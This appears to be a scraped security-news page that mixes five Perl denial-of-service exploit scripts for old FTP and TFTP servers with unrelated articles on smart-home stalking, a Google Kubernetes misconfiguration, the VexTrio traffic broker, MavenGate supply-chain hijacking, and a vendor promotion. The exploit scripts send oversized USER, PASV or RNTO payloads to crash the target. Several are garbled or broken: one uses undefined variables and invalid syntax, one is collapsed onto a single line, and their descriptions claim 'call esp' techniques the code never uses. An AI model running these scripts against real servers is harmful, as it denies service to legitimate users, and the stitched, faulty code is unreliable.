Gabriels FTP Server version 1.2 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: Gabriels FTP Server 1.2 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 25 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1k8QxfP6x908E-1QpRAVulKoAM9OEo1a8/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Gabriels FTP Server 1.2  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=wwHuXfYS8yQ

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user.  
#When authenticating to the FTP server with a long USERNAME or a USERNAME with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x41\x2C\x41\x20\x42"x500;

    my $ftp_socket = IO::Socket::INET->new(  
        PeerAddr => $ip,  
        PeerPort => $port,  
        Proto    => 'tcp',  
        Timeout => '10',  
    ) or die "Não foi possível se conectar ao servidor.";

    my $response = <$ftp_socket>;

    print $ftp_socket "USER $payload\r\n";

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "######################################################################\n";  
      print "#                Gabriels FTP Server 1.2 - Denied of Service         #\n";  
      print "#                                                                    #\n";  
      print "#                       Coded by Fernando Mengali                    #\n";  
      print "#                                                                    #\n";  
      print "#                 e-mail: fernando.mengalli\@gmail.com               #\n";  
      print "#                                                                    #\n";  
      print "######################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

Gabriels FTP Server 1.2 Denial Of Service

Your smart devices may reveal information about you or your location to an ex-partner. Here's how to lock them out.

Stalkers can use all kinds of apps, gadgets, devices, and phones to spy on their targets, which are often their ex-partners. Unfortunately, while they no doubt have many positive uses, smart home devices give stalkers an array of tools to keep an eye on their targets.

If you are the partner that stays in the house you shared together, you need to make sure that you lock out your ex-partner. This may seem unnecessarily painful at first, but it’s better to be safe than sorry. Your ex doesn’t need to be a hacker when he still has access.

Consider the apps you have shared from your phone. Some of these apps can be queried for information about where, when, and with which device they were last accessed. If you want to keep those apps, make sure you have full control and nobody else has access.

Any camera in your house surely stores more footage about you and your family than of any burglar and this footage is usually stored in the cloud. That means it can be viewed by anyone who has correct login credentials. And, when most people think of security cameras and baby monitors, they will ignore less obvious smart appliances.

A smart doorbell can give away who comes to visit you and when. The setting of your smart thermostat can reveal whether you are at home, in your bed, or if you went out for a while. Even smart lighting systems may give away information about your location inside the house or whether you’ve gone out. Your ex will know some of your habits and can use that to interpret the information provided by smart appliances.

Other smart appliances that may reveal information about you or your whereabouts include your TV, coffee maker, oven, refrigerator, and cleaning robot. Someone could also use these smart appliances to make your life miserable. They may be able to remotely turn up the heat, flash your lights, defrost your refrigerator, set a timer for your oven, and so on.

**How to lock out your ex-partner from your smart home**

There may be more smart appliances in your house than you realize. So, it’s important to make a list and get familiar with their settings, so you can:

*   Change the passwords to previously shared accounts.
*   Make sure that your ex doesn’t have access to the email address any “password reset” mails get sent to.
*   Terminate shared social media accounts.
*   Review access to your Google, iCloud, and email accounts. A malicious stalker with access to such important accounts can ruin your life.
*   Log out devices that are not yours from any app your ex may have had access to.
*   Scan your phone for stalkerware if your ex may have had access to the device.
*   Check your phone for apps that have access to location data and ask yourself whether they actually need them. (see below for instructions).

**How to disable location services**

On **iPhones** you can turn location services off completely at **Settings** > **Privacy & Security** > **Location Services**. Here you can also see, and control, individually which apps and system services have access to Location Services data.

On **Android** devices these settings can be different based on vendor and Android version, but generally speaking one of these methods should work to access Location settings:

Swipe down from the top of the screen and find the Location icon. Touch and hold **Location**

*   or  –

In the **Settings** app > press **Location**

Here you can turn **Location** off or look at the permissions for each individual app.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using Malwarebytes Identity Theft Protection.

 How to lock out your ex-partner from your smart home 

Cybersecurity researchers have discovered a loophole impacting Google Kubernetes Engine (GKE) that could be potentially exploited by threat actors with a Google account to take control of a Kubernetes cluster.
The critical shortcoming has been codenamed Sys:All by cloud security firm Orca. As many as 250,000 active GKE clusters in the wild are estimated to be susceptible to the attack vector.
In

Cloud Security / Kubernetes

Cybersecurity researchers have discovered a loophole impacting Google Kubernetes Engine (GKE) that could be potentially exploited by threat actors with a Google account to take control of a Kubernetes cluster.

The critical shortcoming has been codenamed **Sys:All** by cloud security firm Orca. As many as 250,000 active GKE clusters in the wild are estimated to be susceptible to the attack vector.

In a report shared with The Hacker News, security researcher Ofir Yakobi said it "stems from a likely widespread misconception that the system:authenticated group in Google Kubernetes Engine includes only verified and deterministic identities, whereas in fact, it includes any Google authenticated account (even outside the organization)."

The system:authenticated group is a special group that includes all authenticated entities, counting human users and service accounts. As a result, this could have serious consequences when administrators inadvertently bestow it with overly permissive roles.

Specifically, an external threat actor in possession of a Google account could misuse this misconfiguration by using their own Google OAuth 2.0 bearer token to seize control of the cluster for follow-on exploitation such as lateral movement, cryptomining, denial-of-service, and sensitive data theft.

To make matters worse, this approach does not leave a trail in a manner that can be linked back to the actual Gmail or Google Workspace account that obtained the OAuth bearer token.

Sys:All has been found to impact numerous organizations, leading to the exposure of various sensitive data, such as JWT tokens, GCP API keys, AWS keys, Google OAuth credentials, private keys, and credentials to container registries, the last of which could then be used to trojanize container images.

Following responsible disclosure to Google, the company has taken steps to block the binding of the system:authenticated group to the cluster-admin role in GKE versions 1.28 and later.

"To help secure your clusters against mass malware attacks that exploit cluster-admin access misconfigurations, GKE clusters running version 1.28 and later won't allow you to bind the cluster-admin ClusterRole to the system:anonymous user or to the system:unauthenticated or system:authenticated groups," Google now notes in its documentation.

Google is also recommending users to not bind the system:authenticated group to any RBAC roles, as well as assess whether the clusters have been bound to the group using both ClusterRoleBindings and RoleBindings and remove unsafe bindings.

Orca has also warned that while there is no public record of a large-scale attack utilizing this method, it could be only a matter of time, necessitating that users take appropriate steps to secure their cluster access controls.

"Even though this is an improvement, it is important to note that this still leaves many other roles and permissions that can be assigned to the group," the company said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Kubernetes Misconfig Lets Any Gmail Account Control Your Clusters

In today’s highly distributed workplace, every employee has the ability to act as their own CIO, adopting new cloud and SaaS technologies whenever and wherever they need. While this has been a critical boon to productivity and innovation in the digital enterprise, it has upended traditional approaches to IT security and governance.
Nudge Security is the world’s first and only solution to address

In today's highly distributed workplace, every employee has the ability to act as their own CIO, adopting new cloud and SaaS technologies whenever and wherever they need. While this has been a critical boon to productivity and innovation in the digital enterprise, it has upended traditional approaches to IT security and governance.

Nudge Security is the world's first and only solution to address SaaS security and governance at scale by working _with_ employees—not against them. Unlike legacy solutions that attempt to block employees' access to unsanctioned SaaS applications, Nudge Security helps IT and security leaders adapt and align to the needs of the business. The platform orchestrates SaaS administration without sacrificing visibility, centralized governance, or control over the organization's cloud and SaaS security posture.

****How Nudge Security works****

Nudge Security discovers all SaaS accounts ever created by anyone in your organization within minutes of starting a free trial, and only requires a single point of integration: read-only API access to your Microsoft 365 or Google Workspace email provider. No endpoint agents, network proxies, browser plugins, app integrations, or other complicated deployment steps required.

The patented approach to SaaS discovery takes advantage of a consistent design pattern: every SaaS provider uses email to drive user engagement, making it the perfect event log to capture new account sign-ups and other security-relevant activities. By searching and analyzing machine-generated email messages (e.g., no-reply@box.com), Nudge Security builds and updates your inventory of SaaS accounts, users, and resources, without you ever having to tell it which apps to look for.

Inventory of SaaS users and apps

**Implement SaaS security best practices**

Nudge Security not only shows you who has access to what, but it includes valuable context on how access was granted, whether through SSO, an OAuth grant, or username and password. Nudge Security also shows you which apps and accounts are (and aren't) enrolled in MFA or SSO so you can easily track progress against your enrollment efforts and kick off automated workflows to help users enable MFA for their accounts and enroll apps in SSO.

Additionally, you'll see a full inventory of all OAuth grants and scopes to understand where app-to-app integrations could allow data to be shared beyond what is permissible under your data governance policy. OAuth risk scores help you quickly identify overly permissive scopes so you can nudge app users for more context, or revoke the grant with two clicks.

List of OAuth grants and scopes

****Monitor your SaaS attack surface****

Your modern attack surface extends to every SaaS app, user identity, and OAuth grant used by your workforce to build your products and run your business. That's why Nudge Security discovers and monitors your entire SaaS attack surface as it changes, including SaaS apps, cloud infrastructure, developer tools, social media accounts, registered domains and more. With Nudge Security, you can see all externally facing assets an attacker could see so you can take proactive steps to protect and minimize your attack surface.

Nudge Security also provides vendor security profiles for each of your SaaS providers, including breach history, compliance attestations, data locality, and more. With this data, you can conduct SaaS vendor security assessments more quickly and prepare for compliance audits more easily. And, only Nudge Security shows you the SaaS supply chain of your SaaS vendors, so when breaches of high profile apps occur you can quickly determine if you are in the blast radius of a third- or fourth-party supply chain attack. You'll even be alerted if a SaaS provider you use is breached, or if a SaaS tool used by one of your providers is breached.

Breach history for your apps and those used by your SaaS providers

**Rein in SaaS sprawl without impeding productivity**

Research shows that limiting employees' access to SaaS applications in an effort to curb SaaS sprawl leads to frustration and shadowy workarounds.

Nudge Security automates employee engagement with timely, helpful nudges that guide users and application owners toward SaaS security best practices. For example, when a new app is discovered, you can ask the user how they will be using it, or nudge them to use an approved alternative. You can also nudge users to ask if they are still using a particular app so you can reclaim unused licenses. These automated touchpoints make it simple to orchestrate SaaS security and governance at scale, driving increased IT efficiency.

Nudges users to find out what apps they still need

****Automate your SaaS security efforts.****

The last thing you need is another security product that creates overhead for your team. Our built-in playbooks automate workflows for common SaaS security tasks, like conducting user access reviews, bringing AWS accounts into central governance organizations, offboarding departing employees, revoking risky OAuth grants, and more so you can minimize time spent on tedious manual tasks.

Playbooks automate common SaaS administration tasks

****Get started with Nudge Security.****

To discover your organization's SaaS footprint and modernize your approach to SaaS security and governance, start your 14-day free trial today.

Your SaaS management dashboard in Nudge Security

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

What is Nudge Security and How Does it Work?

Solar FTP Server version 2.1.2 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: Solar FTP Server 2.1.2 - PASV - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 23 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1o4xTt67bUJYAAKm0pqNIG99ly--xRQBp/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Solar FTP Server 2.1.2 - PASV - Denial of Service (DoS)  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=U9nH6gqyT88

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The FTP server does not correctly handle the amount of data or bytes sent.  
#When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

print "[+] Connecting to $ip:$port\n";  
my $s = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $port, Proto => 'tcp') or die "Could not connect to $host:$port\n";

$s->send("USER anon\r\n");  
my $response = <$s>;  
print $response;  
$s->send("PASS anon\r\n");  
$response = <$s>;  
print $response;  
$s->send("SYST\r\n");  
$response = <$s>;  
print $response;  
sleep(2);  
$s->send("PASV " . "\x41"x6631 . "\r\n");  
sleep(3);  
$response = <$s>;  
print $response;  
$response = <$s>;  
print $response;  
print ">>> Sending second payload\n";  
$s->send("PASV " . "\x90"x123 . "\x90"x2877 . "\r\n");  
$response = <$s>;  
print $response;  
sleep(2);

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "######################################################################\n";  
      print "#                                                                    #\n";        
      print "#             Solar FTP Server 2.1.2 - PASV - Denied of Service      #\n";  
      print "#                                                                    #\n";  
      print "#                       Coded by Fernando Mengali                    #\n";  
      print "#                                                                    #\n";  
      print "#                 e-mail: fernando.mengalli\@gmail.com               #\n";  
      print "#                                                                    #\n";  
      print "######################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

Solar FTP Server 2.1.2 Denial Of Service

The threat actors behind ClearFake, SocGholish, and dozens of other actors have established partnerships with another entity known as VexTrio as part of a massive "criminal affiliate program," new findings from Infoblox reveal.
The latest development demonstrates the "breadth of their activities and depth of their connections within the cybercrime industry," the company said,

The threat actors behind ClearFake, SocGholish, and dozens of other actors have established partnerships with another entity known as **VexTrio** as part of a massive "criminal affiliate program," new findings from Infoblox reveal.

The latest development demonstrates the "breadth of their activities and depth of their connections within the cybercrime industry," the company said, describing VexTrio as the "single largest malicious traffic broker described in security literature."

VexTrio, which is believed to be have been active since at least 2017, has been attributed to malicious campaigns that use domains generated by a dictionary domain generation algorithm (DDGA) to propagate scams, riskware, spyware, adware, potentially unwanted programs (PUPs), and pornographic content.

This also includes a 2022 activity cluster that distributed the Glupteba malware following an earlier attempt by Google to take down a significant chunk of its infrastructure in December 2021.

In August 2023, the group orchestrated a widespread attack involving compromised WordPress websites that conditionally redirect visitors to intermediary command-and-control (C2) and DDGA domains.

What made the infections significant was the fact that the threat actor leveraged the Domain Name System (DNS) protocol to retrieve the redirect URLs, effectively acting as a DNS-based traffic distribution (or delivery or direction) system (TDS).

VexTrio is estimated to operate a network of more than 70,000 known domains, brokering traffic for as many as 60 affiliates, including ClearFake, SocGholish, and TikTok Refresh.

"VexTrio operates their affiliate program in a unique way, providing a small number of dedicated servers to each affiliate," Infoblox said in a deep-dive report shared with The Hacker News. "VexTrio's affiliate relationships appear longstanding."

Not only can its attack chains can include multiple actors, VexTrio also controls multiple TDS networks to route site visitors to illegitimate content based on their profile attributes (e.g. geolocation, browser cookies, and browser language settings) in order to maximize profits, while filtering out the rest.

These attacks feature infrastructure owned by different parties wherein participating affiliates forward traffic originating from their own resources (e.g., compromised websites) to VexTrio-controlled TDS servers. In the next phase, this traffic is relayed to other fraudulent sites or malicious affiliate networks.

"VexTrio's network uses a TDS to consume web traffic from other cybercriminals, as well as sell that traffic to its own customers," the researchers said. "VexTrio's TDS is a large and sophisticated cluster server that leverages tens of thousands of domains to manage all of the network traffic passing through it."

The VexTrio-operated TDS comes in two flavors, one which is based on HTTP that handles URL queries with different parameters, and another based on DNS, the latter of which began to be first put to use in July 2023.

It's worth noting at this stage that while SocGholish (aka FakeUpdates) is a VexTrio affiliate, it also operates other TDS servers, such as Keitaro and Parrot TDS, with the latter acting as a mechanism for redirecting web traffic to SocGholish infrastructure.

According to Palo Alto Networks Unit 42, Parrot TDS has been active since October 2021, although there is evidence to suggest that it may have been around as early as August 2019.

"Websites with Parrot TDS have malicious scripts injected into existing JavaScript code hosted on the server," the company noted in an analysis last week. "This injected script consists of two components: an initial landing script that profiles the victim, and a payload script that can direct the victim's browser to a malicious location or piece of content."

The injections, in turn, are facilitated by the exploitation of known security vulnerabilities in content management systems (CMS) such as WordPress and Joomla!

The attack vectors adopted by the VexTrio affiliate network for gathering victim traffic is no different in that they primarily single out websites running a vulnerable version of the WordPress software to insert rogue JavaScript into their HTML pages.

In one instance identified by Infobox, a compromised website based in South Africa was found to be injected with JavaScript from ClearFake, SocGholish, and VexTrio.

That's not all. Besides contributing web traffic to numerous cyber campaigns, VexTrio is also suspected to carry out some of its own, making money by abusing referral programs and receiving web traffic from an affiliate and then reselling that traffic to a downstream threat actor.

"VexTrio's advanced business model facilitates partnerships with other actors and creates a sustainable and resilient ecosystem that is extremely difficult to destroy," Infoblox concluded.

"Due to the complex design and entangled nature of the affiliate network, precise classification and attribution is difficult to achieve. This complexity has allowed VexTrio to flourish while remaining nameless to the security industry for over six years."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

VexTrio: The Uber of Cybercrime - Brokering Malware for 60+ Affiliates

Several public and popular libraries abandoned but still used in Java and Android applications have been found susceptible to a new software supply chain attack method called MavenGate.
"Access to projects can be hijacked through domain name purchases and since most default build configurations are vulnerable, it would be difficult or even impossible to know whether an attack was being performed

Several public and popular libraries abandoned but still used in Java and Android applications have been found susceptible to a new software supply chain attack method called MavenGate.

"Access to projects can be hijacked through domain name purchases and since most default build configurations are vulnerable, it would be difficult or even impossible to know whether an attack was being performed," Oversecured said in an analysis published last week.

Successful exploitation of these shortcomings could allow nefarious actors to hijack artifacts in dependencies and inject malicious code into the application, and worse, even compromise the build process through a malicious plugin.

The mobile security firm added that all Maven-based technologies, including Gradle, are vulnerable to the attack, and that it sent reports to more than 200 companies, including Google, Facebook, Signal, Amazon, and others.

Apache Maven is chiefly used for building and managing Java-based projects, allowing users to download and manage dependencies (which are uniquely identified by their groupIds), create documentation, and release management.

While repositories hosting such dependencies can be private or public, an attacker could target the latter to conduct supply chain poisoning attacks by leveraging abandoned libraries added to known repositories.

Specifically, it involves purchasing the expired reversed domain controlled by the owner of the dependency and obtaining access to the groupId.

"An attacker can gain access to a vulnerable groupId by asserting their rights to it via a DNS TXT record in a repository where no account managing the vulnerable groupId exists," the company said.

"If a groupId is already registered with the repository, an attacker can attempt to gain access to that groupId by contacting the repository's support team."

To test out the attack scenario, Oversecured uploaded its own test Android library (groupId: "com.oversecured"), which displays the toast message "Hello World!," to Maven Central (version 1.0), while also uploading two versions to JitPack, where version 1.0 is a replica of the same library published on Maven Central.

But version 1.1 is an edited "untrusted" copy that also has the same groupId, but which points to a GitHub repository under their control and is claimed by adding a DNS TXT record to reference the GitHub username in order to establish proof of ownership.

The attack then works by adding both Maven Central and JitPack to the dependency repository list in the Gradle build script. It's worth noting at this stage that the order of declaration determines how Gradle will check for dependencies at runtime.

"When we moved the JitPack repository above mavenCentral, version 1.0 was downloaded from JitPack," the researchers said. "Changing the library version to 1.1 resulted in using the JitPack version regardless of the position of JitPack in the repository list."

As a result, an adversary looking to corrupt the software supply chain can either target existing versions of a library by publishing a higher version or against new versions by pushing a version that's lower than that of its legitimate counterpart.

This is another form of a dependency confusion attack where an attacker publishes a rogue package to a public package repository with the same name as a package within the intended private repository.

"Most applications do not check the digital signature of dependencies, and many libraries do not even publish it," the researchers added. "If the attacker wants to remain undetected for as long as possible, it makes sense to release a new version of the library with the malicious code embedded, and wait for the developer to upgrade to it."

Of the 33,938 total domains analyzed, 6,170 (18.18%) of them were found to be vulnerable to MavenGate, enabling threat actors to hijack the dependencies and inject their own code.

Sonatype, which owns Maven Central, said the outlined attack strategy "is not feasible due to the automation in place," but noted that it has "disabled all accounts associated with expired domains and GitHub projects" as a security measure.

It further said it addressed a "regression in the public key validation" process that made it possible to upload artifacts to the repository with a non-publicly shared key. It has also announced plans to collaborate with SigStore to digitally sign the components.

"The end developer is responsible for security not only for direct dependencies, but also for transitive dependencies," Oversecured said.

"Library developers should be responsible for the dependencies they declare and also write public key hashes for their dependencies, while the end developer should be responsible only for their direct dependencies."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

MavenGate Attack Could Let Hackers Hijack Java and Android via Abandoned Libraries

EzServer version 6.4.017 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket;

# Exploit Title: EzServer 6.4.017 - Denied of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 22 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1hCYYsWsyeuoHTh3ZosNRbtIBxw0culsu/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: EzServer 6.4.017 - Denied of Service (DoS)  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denied of Service (DoS)

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The FTP server does not correctly handle the amount of data or bytes sent to command RNTO.  
#When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denied of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x41"x10698;

    my $sock = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $port, Proto => 'tcp') or die "[-] Could not connect!\n";  
    $sock->send($payload);  
    $sock->close();

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print q {

                            _/|       
                           // o\      
                           || ._)    
                           //__\     
                           )___(   

      [+] EzServer 6.4.017 - Denied of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

EzServer 6.4.017 Denial Of Service

Golden FTP Server version 2.02b remote denial of service exploit.

    #!/usr/bin/perluse IO::Socket::INET;# Exploit Title: Golden FTP Server 2.02b - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date: 21 january 2024# Vendor Homepage:  N/A# Download to demo: https://drive.google.com/file/d/1AK6x0xKwjVZxoNHbCOIJsIiRAWeMmP_0/view?usp=sharing# Notification vendor: No reported# Tested Version: Golden FTP Server 2.02b - Denial of Service (DoS)# Tested on: Window XP Professional - Service Pack 2 and 3 - English# Vulnerability Type: Denial of Service (DoS)#1. Description#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).#For this exploit I have tried several strategies to increase reliability and performance:#Jump to a static 'call esp'#Backwards jump to code a known distance from the stack pointer.#The FTP server does not correctly handle the amount of data or bytes sent to command RNTO.#When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.#2. Proof of Concept - PoC    $sis="$^O";    if ($sis eq "windows"){      $cmd="cls";    } else {      $cmd="clear";    }    system("$cmd");        intro();    main();        print "[+] Exploiting... \n";print "[+] Connecting to $ip:$port\n";my $s = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $port, Proto => 'tcp') or die "Could not connect to $host:$port\n";$s->send("USER anon\r\n");my $response = <$s>;print $response;$s->send("PASS anon\r\n");$response = <$s>;print $response;$s->send("SYST\r\n");$response = <$s>;print $response;sleep(2);$s->send("PASV " . "\x41"x6631 . "\r\n");sleep(3);$response = <$s>;print $response;$response = <$s>;print $response;print ">>> Sending second payload\n";$s->send("PASV " . "\x90"x123 . "\x90"x2877 . "\r\n");$response = <$s>;print $response;sleep(2);    print "[+] Done - Exploited success!!!!!\n\n";     sub intro {      print q {                              ,--,                       _ ___/ /\|                   ,;'( )__, )  ~                  //  //   '--;                   '   \     | ^                       ^    ^      [+] Golden FTP Server 2.02b - Denied of Service (DoS)      [*] Coded by Fernando Mengali      [@] e-mail: fernando.mengalli@gmail.com      }  }  sub main {our ($ip, $port) = @ARGV;      unless (defined($ip) && defined($port)) {        print "       \nUsage: $0 <ip> <port>                 \n";        exit(-1);      }  }

Golden FTP Server 2.02b Denial Of Service

ProSysInfo TFTP Server TFTPDWIN version 0.4.2 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 20 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1MLqBkCyu0dA-cNgYxCAO8xbsVcof060Z/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: ProSysInfo TFTP Server TFTPDWIN 0.4.2  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=BuONti1AWoU

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The TFTP server does not correctly handle the amount of data or bytes sent..  
#When authenticating to the TFTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x41"x520;

my $socket = IO::Socket::INET->new(  
    PeerAddr => $tftp_server,  
    PeerPort => 69,  
    Proto    => 'udp'  
) die "Não foi possível conectar ao servidor TFTP: $!\n" unless $socket;

    print $ftp_socket $buffer;

    close($socket);

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "######################################################################\n";  
      print "#                                                                    #\n";        
      print "#     ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Denied of Service      #\n";  
      print "#                                                                    #\n";  
      print "#                       Coded by Fernando Mengali                    #\n";  
      print "#                                                                    #\n";  
      print "#                 e-mail: fernando.mengalli\@gmail.com               #\n";  
      print "#                                                                    #\n";  
      print "######################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

Tag

#google